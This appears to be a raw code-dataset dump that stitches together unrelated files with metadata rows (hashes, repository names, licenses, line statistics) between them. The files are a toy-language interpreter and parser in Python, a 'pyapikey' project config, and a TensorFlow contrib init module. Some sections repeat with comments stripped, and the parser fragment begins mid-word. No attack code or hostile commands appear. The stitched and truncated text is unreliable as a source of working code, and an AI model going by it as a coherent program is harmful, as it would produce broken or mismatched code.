# CONTEXT
#######################################
class Context:
def __init__(self, display_name, parent=None, parent_entry_pos=None):
self.display_name = display_name
self.parent = parent
self.parent_entry_pos = parent_entry_pos
self.symbol_table = None
#######################################
# SYMBOL TABLE
#######################################
class SymbolTable:
def __init__(self, parent=None):
self.symbols = {}
self.parent = parent
def get(self, name):
value = self.symbols.get(name, None)
if value == None and self.parent:
return self.parent.get(name)
return value
def set(self, name, value):
self.symbols[name] = value
def remove(self, name):
del self.symbols[name]
#######################################
# INTERPRETER
#######################################
class Interpreter:
def visit(self, node, context):
method_name = f'visit_{type(node).__name__}'
method = getattr(self, method_name, self.no_visit_method)
return method(node, context)
def no_visit_method(self, node, context):
raise Exception(f'No visit_{type(node).__name__} method defined')
###################################
def visit_NumberNode(self, node, context):
return RTResult().success(
Number(node.tok.value).set_context(context).set_pos(node.pos_start, node.pos_end)
)
def visit_VarAccessNode(self, node, context):
res = RTResult()
var_name = node.var_name_tok.value
value = context.symbol_table.get(var_name)
if not value:
return res.failure(RTError(
node.pos_start, node.pos_end,
f"'{var_name}' is not defined",
context
))
value = value.copy().set_pos(node.pos_start, node.pos_end)
return res.success(value)
def visit_VarAssignNode(self, node, context):
res = RTResult()
var_name = node.var_name_tok.value
value = res.register(self.visit(node.value_node, context))
if res.error: return res
context.symbol_table.set(var_name, value)
return res.success(value)
def visit_BinOpNode(self, node, context):
res = RTResult()
left = res.register(self.visit(node.left_node, context))
if res.error: return res
right = res.register(self.visit(node.right_node, context))
if res.error: return res
if node.op_tok.type == TT_PLUS:
result, error = left.added_to(right)
elif node.op_tok.type == TT_MINUS:
result, error = left.subbed_by(right)
elif node.op_tok.type == TT_MUL:
result, error = left.multed_by(right)
elif node.op_tok.type == TT_DIV:
result, error = left.dived_by(right)
elif node.op_tok.type == TT_POW:
result, error = left.powed_by(right)
elif node.op_tok.type == TT_EE:
result, error = left.get_comparison_eq(right)
elif node.op_tok.type == TT_NE:
result, error = left.get_comparison_ne(right)
elif node.op_tok.type == TT_LT:
result, error = left.get_comparison_lt(right)
elif node.op_tok.type == TT_GT:
result, error = left.get_comparison_gt(right)
elif node.op_tok.type == TT_LTE:
result, error = left.get_comparison_lte(right)
elif node.op_tok.type == TT_GTE:
result, error = left.get_comparison_gte(right)
elif node.op_tok.matches(TT_KEYWORD, 'AND'):
result, error = left.anded_by(right)
elif node.op_tok.matches(TT_KEYWORD, 'OR'):
result, error = left.ored_by(right)
if error:
return res.failure(error)
else:
return res.success(result.set_pos(node.pos_start, node.pos_end))
def visit_UnaryOpNode(self, node, context):
res = RTResult()
number = res.register(self.visit(node.node, context))
if res.error: return res
error = None
if node.op_tok.type == TT_MINUS:
number, error = number.multed_by(Number(-1))
elif node.op_tok.matches(TT_KEYWORD, 'NOT'):
number, error = number.notted()
if error:
return res.failure(error)
else:
return res.success(number.set_pos(node.pos_start, node.pos_end))
def visit_IfNode(self, node, context):
res = RTResult()
for condition, expr in node.cases:
condition_value = res.register(self.visit(condition, context))
if res.error: return res
if condition_value.is_true():
expr_value = res.register(self.visit(expr, context))
if res.error: return res
return res.success(expr_value)
if node.else_case:
else_value = res.register(self.visit(node.else_case, context))
if res.error: return res
return res.success(else_value)
return res.success(None)
def visit_ForNode(self, node, context):
res = RTResult()
start_value = res.register(self.visit(node.start_value_node, context))
if res.error: return res
end_value = res.register(self.visit(node.end_value_node, context))
if res.error: return res
if node.step_value_node:
step_value = res.register(self.visit(node.step_value_node, context))
if res.error: return res
else:
step_value = Number(1)
i = start_value.value
if step_value.value >= 0:
condition = lambda: i < end_value.value
else:
condition = lambda: i > end_value.value
while condition():
context.symbol_table.set(node.var_name_tok.value, Number(i))
i += step_value.value
res.register(self.visit(node.body_node, context))
if res.error: return res
return res.success(None)
def visit_WhileNode(self, node, context):
res = RTResult()
while True:
condition = res.register(self.visit(node.condition_node, context))
if res.error: return res
if not condition.is_true(): break
res.register(self.visit(node.body_node, context))
if res.error: return res
return res.success(None)
def visit_FuncDefNode(self, node, context):
res = RTResult()
func_name = node.var_name_tok.value if node.var_name_tok else None
body_node = node.body_node
arg_names = [arg_name.value for arg_name in node.arg_name_toks]
func_value = Function(func_name, body_node, arg_names).set_context(context).set_pos(node.pos_start, node.pos_end)
if node.var_name_tok:
context.symbol_table.set(func_name, func_value)
return res.success(func_value)
def visit_CallNode(self, node, context):
res = RTResult()
args = []
value_to_call = res.register(self.visit(node.node_to_call, context))
if res.error: return res
value_to_call = value_to_call.copy().set_pos(node.pos_start, node.pos_end)
for arg_node in node.arg_nodes:
args.append(res.register(self.visit(arg_node, context)))
if res.error: return res
return_value = res.register(value_to_call.execute(args))
if res.error: return res
return res.success(return_value)
#######################################
# RUN
#######################################
global_symbol_table = SymbolTable()
global_symbol_table.set("NULL", Number(0))
global_symbol_table.set("FALSE", Number(0))
global_symbol_table.set("TRUE", Number(1))
def run(fn, text):
# Generate tokens
lexer = Lexer(fn, text)
tokens, error = lexer.make_tokens()
if error: return None, error
# Generate AST
parser = Parser(tokens)
ast = parser.parse()
if ast.error: return None, ast.error
# Run program
interpreter = Interpreter()
context = Context('<program>')
context.symbol_table = global_symbol_table
result = interpreter.visit(ast.node, context)
return result.value, result.error
| 26.307528
| 115
| 0.682136
|
ll(self):
res = ParseResult()
atom = res.register(self.atom())
if res.error: return res
if self.current_tok.type == TT_LPAREN:
res.register_advancement()
self.advance()
arg_nodes = []
if self.current_tok.type == TT_RPAREN:
res.register_advancement()
self.advance()
else:
arg_nodes.append(res.register(self.expr()))
if res.error:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected ')', 'VAR', 'IF', 'FOR', 'WHILE', 'FUN', int, float, identifier, '+', '-', '(' or 'NOT'"
))
while self.current_tok.type == TT_COMMA:
res.register_advancement()
self.advance()
arg_nodes.append(res.register(self.expr()))
if res.error: return res
if self.current_tok.type != TT_RPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected ',' or ')'"
))
res.register_advancement()
self.advance()
return res.success(CallNode(atom, arg_nodes))
return res.success(atom)
def atom(self):
res = ParseResult()
tok = self.current_tok
if tok.type in (TT_INT, TT_FLOAT):
res.register_advancement()
self.advance()
return res.success(NumberNode(tok))
elif tok.type == TT_IDENTIFIER:
res.register_advancement()
self.advance()
return res.success(VarAccessNode(tok))
elif tok.type == TT_LPAREN:
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
if self.current_tok.type == TT_RPAREN:
res.register_advancement()
self.advance()
return res.success(expr)
else:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected ')'"
))
elif tok.matches(TT_KEYWORD, 'IF'):
if_expr = res.register(self.if_expr())
if res.error: return res
return res.success(if_expr)
elif tok.matches(TT_KEYWORD, 'FOR'):
for_expr = res.register(self.for_expr())
if res.error: return res
return res.success(for_expr)
elif tok.matches(TT_KEYWORD, 'WHILE'):
while_expr = res.register(self.while_expr())
if res.error: return res
return res.success(while_expr)
elif tok.matches(TT_KEYWORD, 'FUN'):
func_def = res.register(self.func_def())
if res.error: return res
return res.success(func_def)
return res.failure(InvalidSyntaxError(
tok.pos_start, tok.pos_end,
"Expected int, float, identifier, '+', '-', '(', 'IF', 'FOR', 'WHILE', 'FUN'"
))
def if_expr(self):
res = ParseResult()
cases = []
else_case = None
if not self.current_tok.matches(TT_KEYWORD, 'IF'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'IF'"
))
res.register_advancement()
self.advance()
condition = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
cases.append((condition, expr))
while self.current_tok.matches(TT_KEYWORD, 'ELIF'):
res.register_advancement()
self.advance()
condition = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
cases.append((condition, expr))
if self.current_tok.matches(TT_KEYWORD, 'ELSE'):
res.register_advancement()
self.advance()
else_case = res.register(self.expr())
if res.error: return res
return res.success(IfNode(cases, else_case))
def for_expr(self):
res = ParseResult()
if not self.current_tok.matches(TT_KEYWORD, 'FOR'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'FOR'"
))
res.register_advancement()
self.advance()
if self.current_tok.type != TT_IDENTIFIER:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier"
))
var_name = self.current_tok
res.register_advancement()
self.advance()
if self.current_tok.type != TT_EQ:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected '='"
))
res.register_advancement()
self.advance()
start_value = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'TO'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'TO'"
))
res.register_advancement()
self.advance()
end_value = res.register(self.expr())
if res.error: return res
if self.current_tok.matches(TT_KEYWORD, 'STEP'):
res.register_advancement()
self.advance()
step_value = res.register(self.expr())
if res.error: return res
else:
step_value = None
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
body = res.register(self.expr())
if res.error: return res
return res.success(ForNode(var_name, start_value, end_value, step_value, body))
def while_expr(self):
res = ParseResult()
if not self.current_tok.matches(TT_KEYWORD, 'WHILE'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'WHILE'"
))
res.register_advancement()
self.advance()
condition = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
body = res.register(self.expr())
if res.error: return res
return res.success(WhileNode(condition, body))
def func_def(self):
res = ParseResult()
if not self.current_tok.matches(TT_KEYWORD, 'FUN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'FUN'"
))
res.register_advancement()
self.advance()
if self.current_tok.type == TT_IDENTIFIER:
var_name_tok = self.current_tok
res.register_advancement()
self.advance()
if self.current_tok.type != TT_LPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected '('"
))
else:
var_name_tok = None
if self.current_tok.type != TT_LPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier or '('"
))
res.register_advancement()
self.advance()
arg_name_toks = []
if self.current_tok.type == TT_IDENTIFIER:
arg_name_toks.append(self.current_tok)
res.register_advancement()
self.advance()
while self.current_tok.type == TT_COMMA:
res.register_advancement()
self.advance()
if self.current_tok.type != TT_IDENTIFIER:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier"
))
arg_name_toks.append(self.current_tok)
res.register_advancement()
self.advance()
if self.current_tok.type != TT_RPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected ',' or ')'"
))
else:
if self.current_tok.type != TT_RPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier or ')'"
))
res.register_advancement()
self.advance()
if self.current_tok.type != TT_ARROW:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected '->'"
))
res.register_advancement()
self.advance()
node_to_return = res.register(self.expr())
if res.error: return res
return res.success(FuncDefNode(
var_name_tok,
arg_name_toks,
node_to_return
))
###################################
def bin_op(self, func_a, ops, func_b=None):
if func_b == None:
func_b = func_a
res = ParseResult()
left = res.register(func_a())
if res.error: return res
while self.current_tok.type in ops or (self.current_tok.type, self.current_tok.value) in ops:
op_tok = self.current_tok
res.register_advancement()
self.advance()
right = res.register(func_b())
if res.error: return res
left = BinOpNode(left, op_tok, right)
return res.success(left)
#######################################
# RUNTIME RESULT
#######################################
class RTResult:
def __init__(self):
self.value = None
self.error = None
def register(self, res):
self.error = res.error
return res.value
def success(self, value):
self.value = value
return self
def failure(self, error):
self.error = error
return self
#######################################
# VALUES
#######################################
class Value:
def __init__(self):
self.set_pos()
self.set_context()
def set_pos(self, pos_start=None, pos_end=None):
self.pos_start = pos_start
self.pos_end = pos_end
return self
def set_context(self, context=None):
self.context = context
return self
def added_to(self, other):
return None, self.illegal_operation(other)
def subbed_by(self, other):
return None, self.illegal_operation(other)
def multed_by(self, other):
return None, self.illegal_operation(other)
def dived_by(self, other):
return None, self.illegal_operation(other)
def powed_by(self, other):
return None, self.illegal_operation(other)
def get_comparison_eq(self, other):
return None, self.illegal_operation(other)
def get_comparison_ne(self, other):
return None, self.illegal_operation(other)
def get_comparison_lt(self, other):
return None, self.illegal_operation(other)
def get_comparison_gt(self, other):
return None, self.illegal_operation(other)
def get_comparison_lte(self, other):
return None, self.illegal_operation(other)
def get_comparison_gte(self, other):
return None, self.illegal_operation(other)
def anded_by(self, other):
return None, self.illegal_operation(other)
def ored_by(self, other):
return None, self.illegal_operation(other)
def notted(self):
return None, self.illegal_operation(other)
def execute(self, args):
return RTResult().failure(self.illegal_operation())
def copy(self):
raise Exception('No copy method defined')
def is_true(self):
return False
def illegal_operation(self, other=None):
if not other: other = self
return RTError(
self.pos_start, other.pos_end,
'Illegal operation',
self.context
)
class Number(Value):
def __init__(self, value):
super().__init__()
self.value = value
def added_to(self, other):
if isinstance(other, Number):
return Number(self.value + other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def subbed_by(self, other):
if isinstance(other, Number):
return Number(self.value - other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def multed_by(self, other):
if isinstance(other, Number):
return Number(self.value * other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def dived_by(self, other):
if isinstance(other, Number):
if other.value == 0:
return None, RTError(
other.pos_start, other.pos_end,
'Division by zero',
self.context
)
return Number(self.value / other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def powed_by(self, other):
if isinstance(other, Number):
return Number(self.value ** other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_eq(self, other):
if isinstance(other, Number):
return Number(int(self.value == other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_ne(self, other):
if isinstance(other, Number):
return Number(int(self.value != other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_lt(self, other):
if isinstance(other, Number):
return Number(int(self.value < other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_gt(self, other):
if isinstance(other, Number):
return Number(int(self.value > other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_lte(self, other):
if isinstance(other, Number):
return Number(int(self.value <= other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_gte(self, other):
if isinstance(other, Number):
return Number(int(self.value >= other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def anded_by(self, other):
if isinstance(other, Number):
return Number(int(self.value and other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def ored_by(self, other):
if isinstance(other, Number):
return Number(int(self.value or other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def notted(self):
return Number(1 if self.value == 0 else 0).set_context(self.context), None
def copy(self):
copy = Number(self.value)
copy.set_pos(self.pos_start, self.pos_end)
copy.set_context(self.context)
return copy
def is_true(self):
return self.value != 0
def __repr__(self):
return str(self.value)
class Function(Value):
def __init__(self, name, body_node, arg_names):
super().__init__()
self.name = name or "<anonymous>"
self.body_node = body_node
self.arg_names = arg_names
def execute(self, args):
res = RTResult()
interpreter = Interpreter()
new_context = Context(self.name, self.context, self.pos_start)
new_context.symbol_table = SymbolTable(new_context.parent.symbol_table)
if len(args) > len(self.arg_names):
return res.failure(RTError(
self.pos_start, self.pos_end,
f"{len(args) - len(self.arg_names)} too many args passed into '{self.name}'",
self.context
))
if len(args) < len(self.arg_names):
return res.failure(RTError(
self.pos_start, self.pos_end,
f"{len(self.arg_names) - len(args)} too few args passed into '{self.name}'",
self.context
))
for i in range(len(args)):
arg_name = self.arg_names[i]
arg_value = args[i]
arg_value.set_context(new_context)
new_context.symbol_table.set(arg_name, arg_value)
value = res.register(interpreter.visit(self.body_node, new_context))
if res.error: return res
return res.success(value)
def copy(self):
copy = Function(self.name, self.body_node, self.arg_names)
copy.set_context(self.context)
copy.set_pos(self.pos_start, self.pos_end)
return copy
def __repr__(self):
return f"<function {self.name}>"
#######################################
# CONTEXT
#######################################
class Context:
def __init__(self, display_name, parent=None, parent_entry_pos=None):
self.display_name = display_name
self.parent = parent
self.parent_entry_pos = parent_entry_pos
self.symbol_table = None
#######################################
# SYMBOL TABLE
#######################################
class SymbolTable:
def __init__(self, parent=None):
self.symbols = {}
self.parent = parent
def get(self, name):
value = self.symbols.get(name, None)
if value == None and self.parent:
return self.parent.get(name)
return value
def set(self, name, value):
self.symbols[name] = value
def remove(self, name):
del self.symbols[name]
#######################################
# INTERPRETER
#######################################
class Interpreter:
def visit(self, node, context):
method_name = f'visit_{type(node).__name__}'
method = getattr(self, method_name, self.no_visit_method)
return method(node, context)
def no_visit_method(self, node, context):
raise Exception(f'No visit_{type(node).__name__} method defined')
###################################
def visit_NumberNode(self, node, context):
return RTResult().success(
Number(node.tok.value).set_context(context).set_pos(node.pos_start, node.pos_end)
)
def visit_VarAccessNode(self, node, context):
res = RTResult()
var_name = node.var_name_tok.value
value = context.symbol_table.get(var_name)
if not value:
return res.failure(RTError(
node.pos_start, node.pos_end,
f"'{var_name}' is not defined",
context
))
value = value.copy().set_pos(node.pos_start, node.pos_end)
return res.success(value)
def visit_VarAssignNode(self, node, context):
res = RTResult()
var_name = node.var_name_tok.value
value = res.register(self.visit(node.value_node, context))
if res.error: return res
context.symbol_table.set(var_name, value)
return res.success(value)
def visit_BinOpNode(self, node, context):
res = RTResult()
left = res.register(self.visit(node.left_node, context))
if res.error: return res
right = res.register(self.visit(node.right_node, context))
if res.error: return res
if node.op_tok.type == TT_PLUS:
result, error = left.added_to(right)
elif node.op_tok.type == TT_MINUS:
result, error = left.subbed_by(right)
elif node.op_tok.type == TT_MUL:
result, error = left.multed_by(right)
elif node.op_tok.type == TT_DIV:
result, error = left.dived_by(right)
elif node.op_tok.type == TT_POW:
result, error = left.powed_by(right)
elif node.op_tok.type == TT_EE:
result, error = left.get_comparison_eq(right)
elif node.op_tok.type == TT_NE:
result, error = left.get_comparison_ne(right)
elif node.op_tok.type == TT_LT:
result, error = left.get_comparison_lt(right)
elif node.op_tok.type == TT_GT:
result, error = left.get_comparison_gt(right)
elif node.op_tok.type == TT_LTE:
result, error = left.get_comparison_lte(right)
elif node.op_tok.type == TT_GTE:
result, error = left.get_comparison_gte(right)
elif node.op_tok.matches(TT_KEYWORD, 'AND'):
result, error = left.anded_by(right)
elif node.op_tok.matches(TT_KEYWORD, 'OR'):
result, error = left.ored_by(right)
if error:
return res.failure(error)
else:
return res.success(result.set_pos(node.pos_start, node.pos_end))
def visit_UnaryOpNode(self, node, context):
res = RTResult()
number = res.register(self.visit(node.node, context))
if res.error: return res
error = None
if node.op_tok.type == TT_MINUS:
number, error = number.multed_by(Number(-1))
elif node.op_tok.matches(TT_KEYWORD, 'NOT'):
number, error = number.notted()
if error:
return res.failure(error)
else:
return res.success(number.set_pos(node.pos_start, node.pos_end))
def visit_IfNode(self, node, context):
res = RTResult()
for condition, expr in node.cases:
condition_value = res.register(self.visit(condition, context))
if res.error: return res
if condition_value.is_true():
expr_value = res.register(self.visit(expr, context))
if res.error: return res
return res.success(expr_value)
if node.else_case:
else_value = res.register(self.visit(node.else_case, context))
if res.error: return res
return res.success(else_value)
return res.success(None)
def visit_ForNode(self, node, context):
res = RTResult()
start_value = res.register(self.visit(node.start_value_node, context))
if res.error: return res
end_value = res.register(self.visit(node.end_value_node, context))
if res.error: return res
if node.step_value_node:
step_value = res.register(self.visit(node.step_value_node, context))
if res.error: return res
else:
step_value = Number(1)
i = start_value.value
if step_value.value >= 0:
condition = lambda: i < end_value.value
else:
condition = lambda: i > end_value.value
while condition():
context.symbol_table.set(node.var_name_tok.value, Number(i))
i += step_value.value
res.register(self.visit(node.body_node, context))
if res.error: return res
return res.success(None)
def visit_WhileNode(self, node, context):
res = RTResult()
while True:
condition = res.register(self.visit(node.condition_node, context))
if res.error: return res
if not condition.is_true(): break
res.register(self.visit(node.body_node, context))
if res.error: return res
return res.success(None)
def visit_FuncDefNode(self, node, context):
res = RTResult()
func_name = node.var_name_tok.value if node.var_name_tok else None
body_node = node.body_node
arg_names = [arg_name.value for arg_name in node.arg_name_toks]
func_value = Function(func_name, body_node, arg_names).set_context(context).set_pos(node.pos_start, node.pos_end)
if node.var_name_tok:
context.symbol_table.set(func_name, func_value)
return res.success(func_value)
def visit_CallNode(self, node, context):
res = RTResult()
args = []
value_to_call = res.register(self.visit(node.node_to_call, context))
if res.error: return res
value_to_call = value_to_call.copy().set_pos(node.pos_start, node.pos_end)
for arg_node in node.arg_nodes:
args.append(res.register(self.visit(arg_node, context)))
if res.error: return res
return_value = res.register(value_to_call.execute(args))
if res.error: return res
return res.success(return_value)
#######################################
# RUN
#######################################
global_symbol_table = SymbolTable()
global_symbol_table.set("NULL", Number(0))
global_symbol_table.set("FALSE", Number(0))
global_symbol_table.set("TRUE", Number(1))
def run(fn, text):
# Generate tokens
lexer = Lexer(fn, text)
tokens, error = lexer.make_tokens()
if error: return None, error
# Generate AST
parser = Parser(tokens)
ast = parser.parse()
if ast.error: return None, ast.error
# Run program
interpreter = Interpreter()
context = Context('<program>')
context.symbol_table = global_symbol_table
result = interpreter.visit(ast.node, context)
return result.value, result.error
| true
| true
|
f70b80aef77d272ca54798b4da68fcd06046255f
| 2,174
|
py
|
Python
|
config/project.py
|
veltzer/pyapikey
|
4e7ea6d5a74263f76fc344489581f03818eb57c6
|
[
"MIT"
] | null | null | null |
config/project.py
|
veltzer/pyapikey
|
4e7ea6d5a74263f76fc344489581f03818eb57c6
|
[
"MIT"
] | null | null | null |
config/project.py
|
veltzer/pyapikey
|
4e7ea6d5a74263f76fc344489581f03818eb57c6
|
[
"MIT"
] | null | null | null |
import pyclassifiers.values
import config.general
import config.helpers
project_github_username = "veltzer"
project_name = "pyapikey"
github_repo_name = project_name
project_website = f"https://{project_github_username}.github.io/{project_name}"
project_website_source = f"https://github.com/{project_github_username}/{project_name}"
project_website_git = f"git://github.com/{project_github_username}/{project_name}.git"
project_website_download_ppa = "https://launchpanet/~mark-veltzer/+archive/ubuntu/ppa"
project_website_download_src = project_website_source
# project_paypal_donate_button_id="ASPRXR59H2NTQ"
# project_google_analytics_tracking_id="UA-56436979-1"
project_long_description = "access api keys from code"
project_short_description = project_long_description
# keywords to put on html pages or for search, dont put the name of the project or my details
# as they will be added automatically...
project_keywords = [
"api",
"key",
"python",
"secret",
]
project_license = "MIT"
project_year_started = "2020"
project_description = project_long_description
project_platforms = [
"python3",
]
project_classifiers = [
pyclassifiers.values.DevelopmentStatus__4_Beta,
pyclassifiers.values.Environment__Console,
pyclassifiers.values.OperatingSystem__OSIndependent,
pyclassifiers.values.ProgrammingLanguage__Python,
pyclassifiers.values.ProgrammingLanguage__Python__3,
pyclassifiers.values.ProgrammingLanguage__Python__3__Only,
pyclassifiers.values.ProgrammingLanguage__Python__36,
pyclassifiers.values.ProgrammingLanguage__Python__37,
pyclassifiers.values.ProgrammingLanguage__Python__38,
pyclassifiers.values.Topic__Utilities,
pyclassifiers.values.License__OSIApproved__MITLicense,
]
project_data_files = []
project_google_analytics_tracking_id = None
project_paypal_donate_button_id = None
codacy_id = None
project_copyright_years = config.helpers.get_copyright_years(project_year_started)
project_google_analytics_snipplet = config.helpers.get_google_analytics(project_google_analytics_tracking_id)
project_paypal_donate_button_snipplet = config.helpers.get_paypal(project_paypal_donate_button_id)
| 41.018868
| 109
| 0.832107
|
import pyclassifiers.values
import config.general
import config.helpers
project_github_username = "veltzer"
project_name = "pyapikey"
github_repo_name = project_name
project_website = f"https://{project_github_username}.github.io/{project_name}"
project_website_source = f"https://github.com/{project_github_username}/{project_name}"
project_website_git = f"git://github.com/{project_github_username}/{project_name}.git"
project_website_download_ppa = "https://launchpanet/~mark-veltzer/+archive/ubuntu/ppa"
project_website_download_src = project_website_source
project_long_description = "access api keys from code"
project_short_description = project_long_description
project_keywords = [
"api",
"key",
"python",
"secret",
]
project_license = "MIT"
project_year_started = "2020"
project_description = project_long_description
project_platforms = [
"python3",
]
project_classifiers = [
pyclassifiers.values.DevelopmentStatus__4_Beta,
pyclassifiers.values.Environment__Console,
pyclassifiers.values.OperatingSystem__OSIndependent,
pyclassifiers.values.ProgrammingLanguage__Python,
pyclassifiers.values.ProgrammingLanguage__Python__3,
pyclassifiers.values.ProgrammingLanguage__Python__3__Only,
pyclassifiers.values.ProgrammingLanguage__Python__36,
pyclassifiers.values.ProgrammingLanguage__Python__37,
pyclassifiers.values.ProgrammingLanguage__Python__38,
pyclassifiers.values.Topic__Utilities,
pyclassifiers.values.License__OSIApproved__MITLicense,
]
project_data_files = []
project_google_analytics_tracking_id = None
project_paypal_donate_button_id = None
codacy_id = None
project_copyright_years = config.helpers.get_copyright_years(project_year_started)
project_google_analytics_snipplet = config.helpers.get_google_analytics(project_google_analytics_tracking_id)
project_paypal_donate_button_snipplet = config.helpers.get_paypal(project_paypal_donate_button_id)
| true
| true
|
f70b810ec69d135f1133e7a8b3cdbfb8803aca24
| 3,377
|
py
|
Python
|
tensorflow/contrib/__init__.py
|
monokrome/tensorflow
|
2533ada7dd45b84d60677b8735e013d21044651a
|
[
"Apache-2.0"
] | 1
|
2018-12-08T18:04:55.000Z
|
2018-12-08T18:04:55.000Z
|
tensorflow/contrib/__init__.py
|
monokrome/tensorflow
|
2533ada7dd45b84d60677b8735e013d21044651a
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/__init__.py
|
monokrome/tensorflow
|
2533ada7dd45b84d60677b8735e013d21044651a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""contrib module containing volatile or experimental code."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Add projects here, they will show up under tf.contrib.
from tensorflow.contrib import bayesflow
from tensorflow.contrib import cloud
from tensorflow.contrib import compiler
from tensorflow.contrib import copy_graph
from tensorflow.contrib import crf
from tensorflow.contrib import cudnn_rnn
from tensorflow.contrib import data
from tensorflow.contrib import deprecated
from tensorflow.contrib import distributions
from tensorflow.contrib import factorization
from tensorflow.contrib import framework
from tensorflow.contrib import graph_editor
from tensorflow.contrib import grid_rnn
from tensorflow.contrib import image
from tensorflow.contrib import input_pipeline
from tensorflow.contrib import integrate
from tensorflow.contrib import keras
from tensorflow.contrib import kernel_methods
from tensorflow.contrib import labeled_tensor
from tensorflow.contrib import layers
from tensorflow.contrib import learn
from tensorflow.contrib import legacy_seq2seq
from tensorflow.contrib import linalg
from tensorflow.contrib import linear_optimizer
from tensorflow.contrib import lookup
from tensorflow.contrib import losses
from tensorflow.contrib import memory_stats
from tensorflow.contrib import metrics
from tensorflow.contrib import nccl
from tensorflow.contrib import nn
from tensorflow.contrib import opt
from tensorflow.contrib import quantization
from tensorflow.contrib import resampler
from tensorflow.contrib import rnn
from tensorflow.contrib import saved_model
from tensorflow.contrib import seq2seq
from tensorflow.contrib import signal
from tensorflow.contrib import slim
from tensorflow.contrib import solvers
from tensorflow.contrib import sparsemax
from tensorflow.contrib import staging
from tensorflow.contrib import stat_summarizer
from tensorflow.contrib import stateless
from tensorflow.contrib import tensor_forest
from tensorflow.contrib import tensorboard
from tensorflow.contrib import testing
from tensorflow.contrib import tfprof
from tensorflow.contrib import timeseries
from tensorflow.contrib import tpu
from tensorflow.contrib import training
from tensorflow.contrib import util
from tensorflow.contrib.ndlstm import python as ndlstm
from tensorflow.contrib.remote_fused_graph import pylib as remote_fused_graph
from tensorflow.contrib.specs import python as specs
from tensorflow.python.util.lazy_loader import LazyLoader
ffmpeg = LazyLoader("ffmpeg",
globals(), "tensorflow.contrib.ffmpeg")
del LazyLoader
del absolute_import
del division
del print_function
| 39.729412
| 80
| 0.822624
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import bayesflow
from tensorflow.contrib import cloud
from tensorflow.contrib import compiler
from tensorflow.contrib import copy_graph
from tensorflow.contrib import crf
from tensorflow.contrib import cudnn_rnn
from tensorflow.contrib import data
from tensorflow.contrib import deprecated
from tensorflow.contrib import distributions
from tensorflow.contrib import factorization
from tensorflow.contrib import framework
from tensorflow.contrib import graph_editor
